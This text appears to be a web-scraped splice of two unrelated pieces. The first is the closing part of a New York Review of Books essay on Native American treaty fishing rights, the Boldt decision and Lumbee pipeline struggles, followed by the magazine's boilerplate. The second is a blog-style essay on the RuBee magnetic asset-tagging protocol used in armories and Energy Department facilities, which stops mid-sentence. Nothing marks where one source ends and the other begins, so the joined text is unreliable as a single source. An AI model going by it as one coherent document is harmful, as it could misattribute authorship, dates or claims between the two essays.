Then in 1953 the US adopted a new policy of “termination,” moving to end federal responsibilities to the tribes entirely, regardless of treaties. Within twenty years Congress terminated the recognition of 109 tribes in Oregon, California, Wisconsin, and elsewhere, affecting more than 11,000 Native people and taking upward of 1.3 million acres of land. No tribes were terminated in Washington state,
but as salmon dwindled, commercial and sports fishermen focused state enforcement on tribal fishers—despite the fact that when Billy Frank’s canoe was rammed on the Nisqually by wardens in a speedboat, the tribes were taking only 6 percent of the total Puget Sound harvest.
In the 1950s and 1960s a confluence of events revitalized Indian country. Native American veterans returned from World War II and the Korean War and attended college; tribes took control of programs formerly administered by the Department of the Interior’s Bureau of Indian Affairs, in schools, hospitals, and resource management.
In the Puget Sound area, leaders of the Muckleshoot, Puyallup, and Nisqually Nations began to meet with attorneys about their fishing rights. In 1963 Makah leaders interviewed Al Ziontz, a Seattle lawyer, who said, “If I were representing the Makah Tribe, the principle of tribal sovereignty would be the way I would go about defending your rights.” Ziontz knew little about Indian law—no law school taught it, despite tribes being, after the federal and state governments, the third of the three sovereign powers in the US constitutional system. Sovereignty made the tribes, as Chief Justice John Marshall wrote in 1832, “distinct political communities, having territorial boundaries, within which their authority is exclusive.”
What happened next was a powerful
mix of scholarship and organizing, with lawyers and activists tag-teaming to move the tribes toward a confrontation with the state. Hank Adams, an Assiniboine and Sioux activist who grew up on the Quinault Reservation—Wilkinson calls him “razor-sharp brilliant and driven”—set up at Frank’s Landing, a riverside encampment named for Billy Frank’s father, where, with Janet McCloud (Tulalip) and Ramona Bennett (Puyallup), he organized the Survival of the American Indian Association. Starting in 1964 the group turned fishing arrests into civil rights actions.
In the group’s first years celebrities (including Marlon Brando and Dick Gregory) were arrested at protests, as Adams organized support from Friends groups, Black Panthers, and the Southern Christian Leadership Conference. A planned five-day action at Frank’s Landing in 1968 lasted for months; in addition to eating the salmon they caught, the activists sold some to fund the encampment. By the time the police raided the Puyallup fish-in, in 1970, the young radicals were supported by the Puyallup tribal council, which sent a police force to protect the activists, who were fired on at random by vigilantes. On the day of the raid, Ramona Bennett said to game wardens approaching in a boat, “Touch our net and we’ll shoot you!”
In suing the State of Washington, Stan Pitkin, the Nixon-appointed US attorney, was working for what he called “a case to end all cases.” The time seemed right; two months before, Nixon had issued his special message to Congress on Indian affairs, which called for tribal “self-determination” and declared the termination policy “morally and legally unacceptable.” (Nixon, who advocated for land returns to tribes, counted his football coach at Whittier College, Wallace Newman, a Luiseño tribal citizen, as a mentor, but the president was likely also responding to Red Power actions, like the occupation of Alcatraz in 1969.) Judge Boldt was a bow-tie-wearing conservative who, just before the trial, had jailed Vietnam War protesters, making the tribes’ legal team nervous. But as the weeks passed, tribal attorneys sensed Boldt’s attentiveness and were relieved to spot Vine Deloria Jr.’s 1969 best seller,
Custer Died for Your Sins: An Indian Manifesto
, in his chambers.
For the first year of the trial, Judge Boldt took testimony on the treaties’ historical background. The State of Washington’s attorneys claimed that in 1854 the tribes were in “rapid cultural decline,” and they argued that the fishing rights defined by the Stevens treaties were moot. The plaintiffs’ expert—Barbara Lane, a Canadian anthropologist who had previously worked with numerous Northwest tribes—described a vibrant, adaptive culture, past and present. “They were not declining into nothing,” she said. Lane showed how the tribes had not only adapted to the new settlers but offered them ways to survive, with new kinds of food, shelter, and clothing. North of the Strait of Juan de Fuca, the British settlers in Victoria burned whale oil purchased from the Makah.
Next, twenty-nine tribal members testified to show that ancient cultural practices were also contemporary. Witnesses spoke in their own languages and recounted decades of abuse by Indian agents while displaying a generational fortitude that, trial participants noticed, captivated Boldt. There was also humor, another survival trait. Asked whether off-reservation fishing of winter chum salmon was prohibited by the state, Billy Frank said, “Well, I have been in jail enough times to say it probably is.”
As the trial progressed, a new facet of the case emerged: “the ambition,” Wilkinson writes, “of tribes to regulate their own members and to engage in salmon management.” Boldt’s ruling could add tribal oversight to federal and state oversight, and he now worked to decide whether the tribes could manage their own fisheries. The great revelation for nontribal citizens was that the tribes not only could but often already did so better than the region’s newcomers. In addition to a young Quinault fisheries expert finishing up his Ph.D., Boldt heard from Horton Capoeman, sixty-eight, who was bilingual and had lived on the Quinault Nation’s reservation his entire life, save for his US Army service. He had served on the tribal council, on the business committee, and as a tribal judge; his testimony detailed how the tribe had for generations managed Native and non-Native fishers when they either poached or overfished, by regulating timing or restricting access, depending on the offense. As Capoeman’s grandfather had told him, “It had to be done in order to bring them back to their senses.”
Boldt’s meticulousness, combined with a temporary assignment in Washington, D.C., meant that the trial stretched on, but at last on February 12, 1974—Lincoln’s birthday, a date Boldt chose to reflect what he saw as the decision’s significance—he upheld the tribes’ treaty rights and reinforced their status as sovereign entities. In straightforward, unsentimental language, he described the tribes’ “paramount dependence upon the products of an aquatic economy, especially anadromous fish, to sustain the Indian way of life.”
The decision was celebrated throughout Indian country. “In the 1960s there was a general belief in the public that treaties were ancient history, not the supreme law of the land,” said John Echohawk, the executive director of the Native American Rights Fund. “Our wish became true…. The treaties were acknowledged as the law. The Boldt Decision was the first big win for the modern tribal sovereignty movement.” A state official, meanwhile, compared the decision to a dictatorship. Bumper stickers read “Can Judge Boldt—not salmon.” Boldt, white Washingtonians argued, had made the majority population “second-class citizens,” denied equal rights.
A federal appeals court upheld the decision in 1975, but the Supreme Court declined to hear it for five years, a silence that exacerbated state officials’ anger and resulted in a salmon fishing free-for-all. Puget Sound was filled with white poachers ramming Indian boats, cutting nets, and slashing car tires (as they still do). At last the Supreme Court upheld the decision on July 2, 1979, quoting Boldt’s opinion repeatedly, as well as a 1905 case,
United States
v.
Winans
, which described the right to take salmon as “not much less necessary to the existence of the Indians than the atmosphere they breathed.” Washington state legislators were reprimanded. “Except for some desegregation cases,” the decision read, “the district court has faced the most concerted official and private efforts to frustrate a decree of a federal court witnessed in this century.”
In the years of the Pacific Northwest fish-ins, Sam Ervin, the North Carolina congressman who led the Watergate hearings, had a reputation for fighting against civil rights legislation, though he nevertheless sponsored the Indian Civil Rights Act of 1968. Unbeknownst to many Americans, North Carolina is home to the largest population of Native Americans east of the Mississippi—a population that included Ervin’s staffer Helen Maynor Scheirbeck, a Lumbee from Robeson County. Scheirbeck also helped pass the 1972 Indian Education Act. Thanks to that law, in the late 1970s a Lumbee educator was brought into the North Carolina elementary school attended by Ryan E. Emanuel, whose book,
On the Swamp: Fighting for Indigenous Environmental Justice
, looks at the survival of indigenous communities along the southern coastal plain.
Emanuel is a hydrologist and a professor at Duke. He grew up in Charlotte, a city in the soft hills of North Carolina’s Piedmont region, spending summers “on the swamp”—the traditional Lumbee territory. “The place we come from is the crazy quilt of blackwater streams, floodplain forests, and sandy uplands that all drain to the Lumbee River,” Emanuel writes.
To be “on the swamp” means to be around Prospect, Saddletree, Burnt Swamp, Sandy Plains, Back Swamp, or one of the myriad other Lumbee communities arrayed across the Lumbee River basin.
The area is characterized by low-lying, hemlock-covered microclimates that are remnants of the just-glaciated past, what paleoecologists refer to as refugia.
By the time Isaac Stevens set out to extinguish Native rights in the Pacific Northwest, tribes in the Southeast (including the Cherokee, Chickasaw, and Choctaw) either had already been forcibly removed to what would become Oklahoma or were negotiating recognition in a society that acknowledged them reluctantly, if at all. Early encounters with settlers in the Southeast had destroyed communities with war and disease, but the Lumbee found a form of protection in the isolated swamps, their own refugia. “To settlers,” Emanuel writes, “they were unmapped places, interstitial lands. But to us, these places were home—backwaters amid swirling currents of colonialism.”
In
On the Swamp
,
Emanuel uses his scientific training to gauge his homeland’s inscrutability to white settlers. In 2019 he compared nearly a hundred maps of the coastal plain created between the 1500s and the early 1900s and discovered that, prior to 1800, colonial mapmakers “generally did a poor job of representing the topology of the Lumbee River.” To miss the river’s “twisting, wandering channel” was to miss the “network of connected places” that makes up the Lumbee community—but it was this obscurity that afforded the Lumbee protection and, with an abundance of food and a strategic distance, strength. It was from a base in a Lumbee swamp that Henry Berry Lowry, a biracial freedom fighter and Lumbee hero, raided the Confederates during and after the Civil War, managing to avoid a sheriff’s hundred-man posse in 1871.
In the twentieth century, attacks came from railroad corporations, logging companies, and developers involved in wetland drainage projects that saw the luxuriously rich ecology of the swamps as merely, a local judge said in 1939, “noisome odors and unwholesome fogs.” Then in the 1950s natural gas came to Robeson County, and the land was suddenly valuable in another way—as an easement. “When Indigenous people today say that fossil fuel projects plow through their lands without regard for the well-being of communities and cultural landscapes, they are not exaggerating,” Emanuel writes. “They are speaking from generations of lived experience.”
Prospect, a town in Robeson County made up almost entirely of Native people, became a gas hub along the Transcontinental Pipeline, or TRANSCO, then the world’s longest gas pipeline, running from Texas to New York. Another hub was established near the historic site of Fort Nooheroka, where in 1713 a white militia had burned to death hundreds of Tuscarora people and enslaved hundreds more. (Many of the remaining Tuscarora soon relocated, joining the Haudenosaunee Confederacy in New York state.) These areas now include streams overwhelmed with animal waste from swine and poultry farms, and, Emanuel notes, “an ever-expanding tangle of gas pipelines and related infrastructure.”
But the Federal Energy Regulatory Commission (FERC) never asked the Lumbee for permission to run pipelines through their land. In 1956, two years before the digging began, Congress passed the Lumbee Act, which recognized the tribe as a sovereign entity. But termination was US Indian policy at the time, and a last-minute clause was added at the Bureau of Indian Affairs’ request, rendering the Lumbee legally invisible:
Nothing in this Act shall make such Indians eligible for any services performed by the United States for Indians because of their status as Indians, and none of the statutes of the United States which affect Indians because of their status as Indians shall be applicable to the Lumbee Indians.
This has caused real-life complications. In 2014, when a consortium of energy companies proposed a six-hundred-mile-long pipeline that would run from West Virginia to Robeson County, the chairman of the Lumbee Nation requested consultation, citing the Lumbee Act. The federal regulators sidestepped the tribe, citing the Lumbee Act, and in 2016 FERC concluded that “environmental justice populations would not be disproportionately affected” by the pipeline.
In 2017 Emanuel published a report in
Science
analyzing the route of the pipeline and showing how developers planned to clear-cut the swamp forests where the pipeline crossed water. Digging into the datasets buried in FERC’s appendixes, he also showed that while the Lumbee and other Native Americans made up just 1 percent of the population in the regions of West Virginia, Virginia, and North Carolina that the line would run through, they made up 5 percent of the people directly affected by its route. The pipeline was canceled in 2020, but had it been built, one in four Native Americans in North Carolina, or 30,000 people, would have lived along it—a population larger than that threatened by the Dakota Access Pipeline at Standing Rock.
Last March, Trump struck down a Biden executive order intended to strengthen tribal sovereignty. Yet even Biden’s order reads as aspirational; it suggested that the government consult with tribes “to ensure that Federal laws, policies, practices, and programs support Tribal Nations more effectively,” but consultation is not law. Deb Haaland, the Laguna Pueblo congresswoman from New Mexico who under Biden became the first indigenous secretary of the interior, oversaw the long-overdue accounting of the barbaric government-run Indian reservation boarding schools, including the uncovering of almost a thousand often unmarked graves. But in 2023, in that same position, she permitted ConocoPhillips’s $8 billion drilling plan on Alaska’s North Slope, the largest oil drilling project on public lands in US history, over the concerns of the Iñupiat mayor closest to the site, who noted that the previous year, during an uncontrolled ConocoPhillips gas release (“a unique event, with nothing similar ever occurring,” the corporation insisted), employees were evacuated while village residents were told they were safe.
This is not to say that the Trump administration, which aims to defund the federal agencies tribes rely on, won’t be worse than Biden. The government shutdown itself highlights the way the federal government funds its trust and treaty obligations through discretionary as opposed to mandatory funding for tribes, already the least well-funded among us, and the rush to extract everything from oil to rare earth minerals will hit indigenous lands hardest. But then the US government has a long, bipartisan, Constitution-sanctioned history of both taking Native territory and destroying it, denying imprisoned Native children their language in the process. Emanuel cites the United Nations special rapporteur on the rights of indigenous peoples, Victoria Tauli-Corpuz, who, after visiting western tribes in 2017, critiqued the US’s disregard for tribal sovereignty:
Sadly, I found the situation faced by the Standing Rock Sioux Tribe is shared by many other indigenous communities in the United States, as tribal communities nationwide wrestle with the realities of living in ground zero of energy impact.
The Boldt decision looked hard at a complicated history to map a new future for Native rights—and it worked. It is often cited as a first step toward the UN’s adoption in 2007 of the Declaration on the Rights of Indigenous Peoples. (The US was one of four “no” votes and the last holdout until late 2010, when Barack Obama agreed to support it, if only as an aspiration.) The autonomy allowed by Boldt helped the Olympic Peninsula’s Lower Elwha Klallam Tribe, whose elders had signed one of Stevens’s treaties, to, by 2014, take down the salmon-blocking dams that had been built on the Elwha River in 1910 by investors from Winnipeg and Chicago to power pulp mills. In 2023 the tribe held its first ceremonial salmon catch in decades. In California and Oregon, where the Yurok Tribe used its Boldt-era legal victories to regain its land and eventually take down dams on the Klamath River, salmon took only about a week to find their way to tributaries that had not had salmon in them for over half a century. “It feels like catharsis. It feels like we are on the right path. It gives me hope for the future,” Barry McCovey Jr., the director of the Yurok Tribe’s fisheries department, told the Associated Press
.
Hope is a rare commodity, but if there is hope for the earth, generally it has to do with acknowledging indigenous sovereignty in the face of insatiable resource extraction. Indigenous people make up 6 percent of the world’s population, but their territory accounts for close to a quarter of the earth’s land surface, containing more than a third of remaining natural lands worldwide, often in northern boreal and equatorial forests. Tribes have built up a body of Indian law that is as dynamic as it is unacknowledged. “Tribal sovereignty is one of the most powerful and valuable public ideas that has ever touched my mind,” Wilkinson writes.
I say that, not just because of tribal sovereignty’s legal and intellectual worth, but because it also has proved to be so invincible. The world’s most powerful nation tried to terminate tribal sovereignty over the course of many generations, but could not because it meant so much to Indian people, small minority that they were, and they refused to give in.
Robert Sullivan
’s books include
Rats
,
The Meadowlands
, and
A Whale Hunt
. His latest,
Double Exposure: Resurveying the West with Timothy O’Sullivan, America’s Most Mysterious War Photographer
, was published last year. (December 2025)
The New York Review
was launched during the New York City newspaper strike of 1963, when the magazine’s founding editors, Robert Silvers and Barbara Epstein, alongside Jason Epstein, Robert Lowell, and Elizabeth Hardwick, decided to start a new kind of publication—one in which the most interesting, lively, and qualified minds of the time could write about current books and issues in depth.
Readers responded by buying almost every copy and writing thousands of letters to demand that the Review continue. From the beginning, the editors were determined that the Review should be an independent publication; it began life as an editorial voice beholden to no one, and it remains so today.
Silvers and Epstein continued as co-editors until her death in 2006, and Silvers served as sole editor until his death in 2017. Since 2019 Emily Greenhouse has edited The New York Review, and it remains the magazine where, across twenty issues each year, the major voices in world literature and thought discuss books and ideas. In addition to the print magazine, the NYR Online publishes thorough and wide-ranging essays about politics national and global, film, art, and the cultural preoccupations of the day.
I have at least a few readers for which the sound of a man's voice saying
"government cell phone detected" will elicit a palpable reaction. In
Department of Energy facilities across the country, incidences of employees
accidentally carrying phones into secure areas are reduced through a sort of
automated nagging. A device at the door monitors for the presence of a tag;
when the tag is detected it plays an audio clip. Because this is the government,
the device in question is highly specialized, fantastically expensive, and
says "government cell phone" even though most of the phones in question are
personal devices. Look, they already did the recording, they're not changing
it now!
One of the things that I love is weird little wireless networks. Long ago I
wrote about
ANT+
,
for example, a failed personal area network standard designed mostly around
fitness applications. There's tons of these, and they have a lot of
similarities---so it's fun to think about the protocols that went down a
completely different path. It's even better, of course, if the protocol is
obscure outside of an important niche. And a terrible website, too? What more
could I ask for.
The DoE's cell-phone nagging boxes, and an array of related but more critical
applications, rely on an unusual personal area networking protocol called RuBee.
RuBee is a product of Visible Assets Inc., or VAI, founded in 2004
1
by John K.
Stevens. Stevens seems a somewhat improbable founder, with a background in
biophysics and eye health, but he's a repeat entrepreneur. He's particularly fond of companies
called Visible: he founded Visible Assets after his successful tenure as CEO of
Visible Genetics. Visible Genetics was an early innovator in DNA sequencing, and
still provides a specialty laboratory service that sequences samples of HIV in
order to detect vulnerabilities to antiretroviral medications.
Clinical trials in the early 2000s exposed Visible Genetics to one of the more
frustrating parts of health care logistics: refrigeration. Samples being shipped
to the lab and reagents shipped out to clinics were both temperature sensitive.
Providers had to verify that these materials had stayed adequately cold throughout
shipping and handling, otherwise laboratory results could be invalid or incorrect.
Stevens became interested in technical solutions to these problems; he wanted
some way to verify that samples were at acceptable temperatures both in storage
and in transit.
Moreover, Stevens imagined that these sensors would be in continuous communication.
There's a lot of overlap between this application and personal area networks (PANs),
protocols like Bluetooth that provide low-power communications over short ranges.
There is also clear overlap with RFID; you can buy RFID temperature sensors.
VAI, though, coined the term
visibility network
to describe RuBee. That's
visibility as in asset visibility: somewhat different from Bluetooth or RFID,
RuBee as a protocol is explicitly designed for situations where you need to
"keep tabs" on a number of different objects. Despite the overlap with other
types of wireless communications, the set of requirements on a visibility network
have lead RuBee down a very different technical path.
Visibility networks have to be highly reliable. When you are trying to keep
track of an asset, a failure to communicate with it represents a fundamental
failure of the system. For visibility networks, the ability to actually convey
a payload is secondary: the main function is just reliably detecting that
endpoints exist. Visibility networks have this in common with RFID, and indeed,
despite its similarities to technologies like BLE RuBee is positioned mostly as
a competitor to technologies like UHF RFID.
There are several differences between RuBee and RFID; for example, RuBee uses
active (battery-powered) tags and the tags are generally powered by a complete
4-bit microcontroller. That doesn't necessarily sound like an advantage, though.
While RuBee tags advertise a battery life of "5-25 years", the need for a battery seems
mostly like a liability. The real feature is what active tags enable: RuBee
operates in the low frequency (LF) band, typically at 131 kHz.
At that low frequency, the wavelength is very long, about 2.5 km. With such a
long wavelength, RuBee communications all happen at much less than one wavelength
in range. RF engineers refer to this as near-field operation, and it has some
properties that are intriguingly different from more typical far-field RF
communications. In the near-field, the magnetic field created by the antenna is
more significant than the electrical field. RuBee devices are intentionally
designed to emit very little electrical RF signal. Communications within a RuBee network are
achieved through magnetic, not electrical fields. That's the core of RuBee's magic.
The idea of magnetic coupling is not unique to RuBee. Speaking of the near-field,
there's an obvious comparison to NFC which works much the same way. The main difference,
besides the very different logical protocols, is that NFC operates at 13.56 MHz.
At this higher frequency, the wavelength is only around 20 meters. The requirement
that near-field devices be much closer than a full wavelength leads naturally to
NFC's very short range, typically specified as 4 cm.
At LF frequencies, RuBee can achieve magnetic coupling at ranges up to about 30
meters. That's a range comparable to, and often much better than, RFID inventory
tracking technologies. Improved range isn't RuBee's only benefit over RFID. The
properties of magnetic fields also make it a more robust protocol. RuBee promises
significantly less vulnerability to shielding by metal or water than RFID.
There are two key scenarios where this comes up: the first is equipment stored in
metal containers or on metal shelves, or equipment that is itself metallic. In
that scenario, it's difficult to find a location for an RFID tag that won't suffer
from shielding by the container. The case of water might seem less important, but
keep in mind that people are made mostly of water. RFID reading is often unreliable
for objects carried on a person, which are likely to be shielded from the reader
by the water content of the body.
These problems are not just theoretical. WalMart is a major adopter of RFID inventory
technology, and in early rollouts struggled with low successful read rates. Metal,
moisture (including damp cardboard boxes), antenna orientation, and multipath/interference
effects could cause read failure rates as high as 33% when scanning a pallet of goods.
Low read rates are mostly addressed by using RFID "portals" with multiple antennas.
Eight antennas used as an array greatly increase read rate, but at a cost of over
ten thousand dollars per portal system. Even so, WalMart seems to now target a
success rate of only 95% during bulk scanning.
95% might sound pretty good, but there are a lot of visibility applications where
a failure rate of even a couple percent is unacceptable. These mostly go by the
euphemism "high value goods," which depending on your career trajectory you may
have encountered in corporate expense and property policies. High-value goods
tend to be items that are both attractive to theft and where theft has particularly
severe consequences. Classically, firearms and explosives. Throw in classified
material for good measure.
I wonder if Stevens was surprised by RuBee's market trajectory. He came out of
the healthcare industry and, it seems, originally developed RuBee for cold
chain visibility... but, at least in retrospect, it's quite obvious that its
most compelling application is in the armory.
Because RuBee tags are small and largely immune to shielding by metals, you
can embed them directly in the frames of firearms, or as an aftermarket
modification you can mill out some space under the grip. RuBee tags in
weapons will read reliably when they are stored in metal cases or on
metal shelving, as is often the case. They will even read reliably when a
weapon is carried holstered, close to a person's body.
Since RuBee tags incorporate an active microcontroller, there are even more
possibilities. Temperature logging is one thing, but firearm-embedded RuBee
tags can incorporate an accelerometer (NIST-traceable, VAI likes to emphasize)
and actually count the rounds fired.
Sidebar time: there is a long history of political hazard around "smart guns."
The term "smart gun" is mostly used more specifically for firearms that
identify their user, for example by fingerprint authentication or detection of
an RFID fob. The idea has become vague enough, though, that mention of a
firearm with any type of RFID technology embedded would probably raise the
specter of the smart gun to gun-rights advocates.
Further, devices embedded in firearms that count the number of
rounds fired have been proposed for decades, if not a century, as a means of
accountability. The holder of a weapon could, in theory, be required to
positively account for every round fired. That could eliminate incidents of
unreported use of force by police, for example. In practice I think this is
less compelling than it sounds, simple counting of rounds leaves too many
opportunities to fudge the numbers and conceal real-world use of a weapon as
range training, for example.
That said, the NRA has long been vehemently opposed to the incorporation of any sort of
technology into weapons that could potentially be used as a means of state
control or regulation. The concern isn't completely unfounded; the state of
New Jersey did, for a time, have legislation that would have made user-identifying
"smart guns" mandatory if they were commercially available. The result of
the NRA's strident lobbying is that no such gun has ever become commercially
available; "smart guns" have been such a political third rail that any firearms
manufacturer that dared to introduce one would probably face a boycott by most
gun stores. For better or worse, a result of the NRA's powerful political
advocacy in this area is that the concept of embedding security or accountability
technology into weapons has never been seriously pursued in the US. Even a
tentative step in that direction can produce a huge volume of critical press
for everyone involved.
I bring this up because I think it explains some of why VAI seems a bit vague
and cagey about the round-counting capabilities of their tags. They position it
as purely a maintenance feature, allowing the armorer to keep accurate tabs on
the preventative maintenance schedule for each individual weapon (in armory
environments, firearm users are often expected to report how many rounds
they fired for maintenance tracking reasons). The resistance of RuBee tags
to concealment is only positioned as a deterrent to theft, although the idea
of RuBee-tagged firearms creates obvious potential for security screening.
Probably the most profitable option for VAI would be to promote RuBee-tagged
firearms as tool for enforcement of gun control laws, but this is
a political impossibility and bringing it up at all could cause significant
reputational harm, especially with the government as a key customer. The result
is marketing copy that is a bit odd, giving a set of capabilities that imply
an application that is never mentioned.
VAI found an incredible niche with their arms-tracking application. Institutional
users of firearms, like the military, police, and security forces, are relatively
price-insensitive and may have strict accounting requirements. By the mid-'00s,
VAI was into the long sales cycle of proposing the technology to the military.
That wasn't entirely unsuccessful. RuBee shot-counting weapon inventory tags were
selected by the Naval Surface Warfare Center in 2010 for installation on SCAR
and M4 rifles. That contract had a five-year term, it's unclear to me if it was
renewed. Military contracting opened quite a few doors to VAI, though, and
created a commercial opportunity that they eagerly pursued.
Perhaps most importantly, weapons applications required an impressive round of
safety and compatibility testing. RuBee tags have the fairly unique distinction
of military approval for direct attachment to ordnance, something called "zero
separation distance" as the tags do not require a minimum separation from
high explosives. Central to that certification are findings of intrinsic safety
of the tags (that they do not contain enough energy to trigger explosives) and
that the magnetic fields involved cannot convey enough energy to heat anything
to dangerous temperatures.
That's not the only special certification that RuBee would acquire. The military
has a lot of firearms, but military procurement is infamously slow and mercurial.
Improved weapon accountability is, almost notoriously, not a priority for the
US military which has often had stolen weapons go undetected until their later
use in crime. The Navy's interest in RuBee does not seem to have translated to
more widespread military applications.
Then you have police departments, probably the largest institutional owners of
firearms and a very lucrative market for technology vendors. But here we run
into the political hazard: the firearms lobby is very influential on police
departments, as are police unions which generally oppose technical accountability
measures. Besides, most police departments are fairly cash-poor and are not
likely to make a major investment in a firearms inventory system.
That leaves us with institutional security forces. And there is one category
of security force that are particularly well-funded, well-equipped, and
beholden to highly R&D-driven, almost pedantic standards of performance:
the protection forces of atomic energy facilities.
Protection forces at privately-operated atomic energy facilities, such as
civilian nuclear power plants, are subject to licensing and scrutiny by the
Nuclear Regulatory Commission. Things step up further at the many facilities
operated by the National Nuclear Security Administration (NNSA). Protection
forces for NNSA facilities are trained at the Department of Energy's National
Training Center, at the former Manzano Base here in Albuquerque. Concern over
adequate physical protection of NNSA facilities has lead Sandia National
Laboratories to become one of the premier centers for R&D in physical security.
Teams of scientists and engineers have applied sometimes comical scientific rigor to "guns,
gates, and guards," the traditional articulation of physical security in the
nuclear world.
That scope includes the evaluation of new technology for the management of
protection forces, which is why Oak Ridge National Laboratory launched an
evaluation program for the RuBee tagging of firearms in their armory. The
white paper on this evaluation is curiously undated, but citations "retrieved 2008"
lead me to assume that the evaluation happened right around the middle of the
'00s. At the time, VAI seems to have been involved in some ultimately unsuccessful
partnership with Oracle, leading to the branding of the RuBee system as Oracle
Dot-Tag Server. The term "Dot-Tag" never occurs outside of very limited materials
around the Oracle partnership, so I'm not sure if it was Oracle branding for
RuBee or just some passing lark. In any case, Oracle's involvement seems to have
mainly just been the use of the Oracle database for tracking inventory data---which
was naturally replaced by PostgreSQL at Oak Ridge.
The Oak Ridge trial apparently went well enough, and around the same time, the Pantex
Plant in Texas launched an evaluation of RuBee for tracking classified tools.
Classified tools are a tricky category, as they're often metallic and often stored
in metallic cases. During the trial period, Pantex tagged a set of sample classified
tools with RuBee tags and then transported them around the property, testing the
ability of the RuBee controllers to reliably detect them entering and exiting areas of
buildings. Simultaneously, Pantex evaluated the use of RuBee tags to track containers
of "chemical products" through the manufacturing lifecycle. Both seem to have
produced positive results.
There are quite a few interesting and strange aspects of the RuBee system, a
result of its purpose-built Visibility Network nature. A RuBee controller can have
multiple antennas that it cycles through. RuBee tags remain in a deep-sleep mode
for power savings until they detect a RuBee carrier during their periodic wake
cycle. When a carrier is detected, they fully wake and listen for traffic. A
RuBee controller can send an interrogate message and any number of tags can respond,
with an interesting and novel collision detection algorithm used to ensure
reliable reading of a large number of tags.
The actual RuBee protocol is quite simple, and can also be referred to as IEEE 1902.1
since the decision of VAI to put it through the standards process. Packets are
small and contain basic addressing info, but they can also contain arbitrary payload in both directions,
perfect for data loggers or sensors. RuBee tags are identified by something that VAI
oddly refers to as an "IP address," causing some confusion over whether or not VAI
uses IP over 1902.1. They don't, I am confident saying after reading a whole lot of
documents. RuBee tags, as standard, have three different 4-byte addresses. VAI refers
to these as "IP, subnet, and MAC,"
2
but these names are more like analogies.
Really, the "IP address" and "subnet" are both configurable arbitrary addresses,
with the former intended for unicast traffic and the latter for broadcast. For example,
you would likely give each asset a unique IP address, and use subnet addresses for
categories or item types. The subnet address allows a controller to interrogate for
every item within that category at once. The MAC address is a fixed, non-configurable
address derived from the tag's serial number. They're all written in the formats
we associate with IP networks, dotted-quad notation, as a matter of convenience.
And that's about it as far as the protocol specification, besides of course the
physical details which are a 131,072 Hz carrier, 1024 Hz data clock, either ASK
or BPSK modulation. The specification also describes an interesting mode called
"clip," in which a set of multiple controllers interrogate in exact synchronization
and all tags then reply in exact synchronization. Somewhat counter-intuitively,
because of the ability of RuBee controllers to separate out multiple simultaneous
tag transmissions using an anti-collision algorithm based on random phase shifts
by each tag, this is ideal. It allows a room, say an armory, full of RuBee
controllers to rapidly interrogate the entire contents of the room. I think this
feature may have been added after the Oak Ridge trials...
RuBee is quite slow, typically 1,200 baud, so inventorying a large number of assets
can take a while (Oak Ridge found that their system could only collect data on 2-7
tags per second per controller). But it's so robust that it an achieve a 100% read
rate in some very challenging scenarios. Evaluation by the DoE and the military
produced impressive results. You can read, for example, of a military experiment in
which a RuBee antenna embedded in a roadway reliably identified rifles secured in
steel containers in passing Humvees.
Paradoxically, then, one of the benefits of RuBee in the military/defense context
is that it is also
difficult
to receive. Here is RuBee's most interesting trick:
somewhat oversimplified, the strength of an electrical radio signal goes as 1/r,
while the strength of a magnetic field goes as 1/r^3. RuBee equipment is optimized,
by antenna design, to produce a minimal electrical field. The result is that RuBee
tags can very reliably be contacted at short range (say, around ten feet), but are
virtually impossible to contact or even detect at ranges over a few hundred feet.
To the security-conscious buyer, this is a huge feature. RuBee tags are highly
resistant to communications or electronic intelligence collection.
Consider the logical implications of tagging the military's rifles. With
conventional RFID, range is limited by the size and sensitivity of the antenna.
Particularly when tags are incidentally powered by a nearby reader, an adversary
with good equipment can detect RFID tags at very long range. VAI heavily references
a 2010 DEFCON presentation, for example, that demonstrated detection of RFID tags
at a range of 80 miles. One imagines that opportunistic detection by satellite is feasible for
a state intelligence agency. That means that your rifle asset tracking is also
revealing the movements of soldiers in the field, or at least providing a way to
detect their approach.
Most RuBee tags have their transmit power reduced by configuration, so even the
maximum 100' range of the protocol is not achievable. VAI suggests that typical
RuBee tags cannot be detected by radio direction finding equipment at ranges
beyond 20', and that this range can be made shorter by further reducing transmit
power.
Once again, we have caught the attention of the Department of Energy. Because of
the short range of RuBee tags, they have generally been approved as not representing
a COMSEC or TEMPEST hazard to secure facilities. And that brings us back to the
very beginning: why does the DoE use a specialized, technically interesting, and
largely unique radio protocol to fulfill such a basic function as nagging people
that have their phones? Because RuBee's security properties have allowed it to be
approved for use adjacent to and inside of secure facilities. A RuBee tag, it is
thought, cannot be turned into a listening device because the intrinsic range
limitation of magnetic coupling will make it impossible to communicate with the
tag from outside of the building. It's a lot like how infrared microphones still
see some use in secure facilities, but so much more interesting!
VAI has built several different product lines around RuBee, with names like
Armory 20/20 and Shot Counting Allegro 20/20 and Store 20/20. The founder started
his career in eye health, remember. None of them are that interesting, though.
They're all pretty basic CRUD applications built around polling multiple RuBee
controllers for tags in their presence.
And then there's the "Alert 20/20 DoorGuard:" a metal pedestal with a RuBee
controller and audio announcement module, perfect for detecting government
cell phones.
One of the strangest things about RuBee is that it's hard to tell if it's still
a going concern. VAI's website has a press release section, where nothing has been
posted since 2019. The whole website feels like it was last revised even longer
ago. When RuBee was newer, back in the '00s, a lot of industry journals covered it
with headlines like "the new RFID." I think VAI was optimistic that RuBee could
displace all kinds of asset tracking applications, but despite some special
certifications in other fields (e.g. approval to use RuBee controllers and tags
around pacemakers in surgical suites), I don't think RuBee has found much success
outside of military applications.
RuBee's resistance to shielding is impressive, but RFID read rates have improved
considerably with new DSP techniques, antenna array designs, and the generally
reduced cost of modern RFID equipment. RuBee's unique advantages, its security
properties and resistance to even intentional exfiltration, are interesting but
not worth much money to buyers other than the military.
So that's the fate of RuBee and VAI: defense contracting. As far as I can tell,
RuBee and VAI are about as vital as they have ever been, but RuBee is now installed
as just one part of general defense contracts around weapons systems, armory
management, and process safety and security. IEEE standardization has opened the
door to use of RuBee by federal contractors under license, and indeed, Lockheed
Martin is repeatedly named as a licensee, as are firearms manufacturers with military
contracts like Sig Sauer.
Besides, RuBee continues to grow closer to the DoE. In 2021, VAI appointed Lisa
Gordon-Hagerty to it board of directors. Gordon-Hagerty was undersecretary of
Energy and had lead the NNSA until the year before. This year, the New Hampshire
Small Business Development Center wrote a glowing profile of VAI. They described
it as a 25-employee company with a goal of hitting $30 million in annual revenue in the
next two years.
Despite the outdated website, VAI claims over 1,200 RuBee sites in service. I wonder
how many of those are Alert 20/20 DoorGuards? Still, I do believe there are military
